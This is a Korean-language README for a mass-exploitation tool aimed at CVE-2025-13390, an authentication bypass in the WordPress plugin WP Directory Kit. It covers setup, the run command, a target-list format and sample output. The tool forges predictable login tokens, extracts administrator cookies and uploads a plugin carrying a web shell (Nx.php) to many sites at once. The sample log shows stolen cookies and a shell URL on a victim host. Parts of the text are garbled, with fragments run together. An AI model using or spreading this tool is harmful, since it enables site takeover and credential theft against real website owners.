
WP Directory Kit <= 1.4.4 - 인증 우회로 계정 탈취를 통한 권한 상승
WP Directory Kit <= 1.4.4 - 인증 우회를 통한 권한 상승 (계정 탈취)
WordPress WP Directory Kit 플러그인은 1.4.4 이하 모든 버전에서
wdk_generate_auto_login_link함수의 인증 알고리즘 구현 오류로 인해 인증 우회에 취약합니다.이는 기능이 암호학적으로 취약한 토큰 생성 메커니즘을 사용하기 때문입니다. 이 결함으로 인해 인증되지 않은 공격자가 예측 가능한 토큰을 이용해 자동 로그인 엔드포인트로 관리자 권한을 획득하고 전체 사이트를 장악할 수 있습니다.
- CNA: Wordfence
- 기본 점수: 10.0 치명적 (CRITICAL)
- 벡터:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Nx.php 필요).Nx.php)를 통해 셸 접근 권한을 얻습니다.pip install -r requirements.txt
# 또는 개별 설치:
pip install requests beautifulsoup4 colorama
Nx.php라는 이름의 셸이 포함된 ZIP 파일(Nxploited.zip)을 필요로 합니다.list.txt)을 준비합니다.http(s)://)를 포함하거나 도메인/IP만 입력할 수 있습니다.http://vuln-site1.tld
https://vuln-site2.tld
192.168.56.101

python3 CVE-2025-13390.py
list.txtNxploited.zipsuccess_cookies.txt — 관리자 쿠키가 성공적으로 추출된 사이트.success_shells.txt — 성공적으로 업로드된 셸의 URL.uploads_log.txt — 플러그인 업로드 시도의 전체 로그. _______ __ __ _______ _______ _______ _______ _______ ____ _______ _______ _______ _______
| || | | || | | || _ || || | | | | || || _ || _ |
| || |_| || ___| ____ |____ || | | ||____ || ____| ____ | | |___ ||___ || | | || | | |
| || || |___ |____| ____| || | | | ____| || |____ |____| | | ___| | ___| || |_| || | | |
| _|| || ___| | ______|| |_| || ______||_____ | | | |___ ||___ ||___ || |_| |
| |_ | | | |___ | |_____ | || |_____ _____| | | | ___| | ___| | | || |
|_______| |___| |_______| |_______||_______||_______||_______| |___| |_______||_______| |___||_______|
By: Nxploited (Khaled ALenazi)
Telegram: @Nxploited
GitHub: https://github.com/Nxploited
Professional WordPress cookie exploit & plugin uploader.
Features: Extracts login cookies, uploads plugin (default: Nxploited.zip), expects shell as Nx.php.
Results: Successful shells in success_shells.txt, successful cookies in success_cookies.txt.
Highly automated. Multi-threaded. For authorized auditing only.
Targets file [default: list.txt]:
Threads [default: 8]:
Target user ID [default: 1]:
Token [default: a1b2c3d4e5]:
Plugin ZIP file path [default: Nxploited.zip]:
Plugin folder name? [default: Nxploited]:
Reminder: Ensure your shell file INSIDE the plugin ZIP is named Nx.php.
Loaded 42 targets, 8 threads.
...
[SUCCESS] http://victim.com: Cookie extracted
[SHELL] http://victim.com/wp-content/plugins/Nxploited/Nx.php
...
Done. Shell URLs in success_shells.txt, cookies in success_cookies.txt.
8, 16 등)1 = 관리자)/wp-content/plugins/ 아래 페이로드가 위치할 하위 폴더 (기본값: ZIP 이름에서 추출)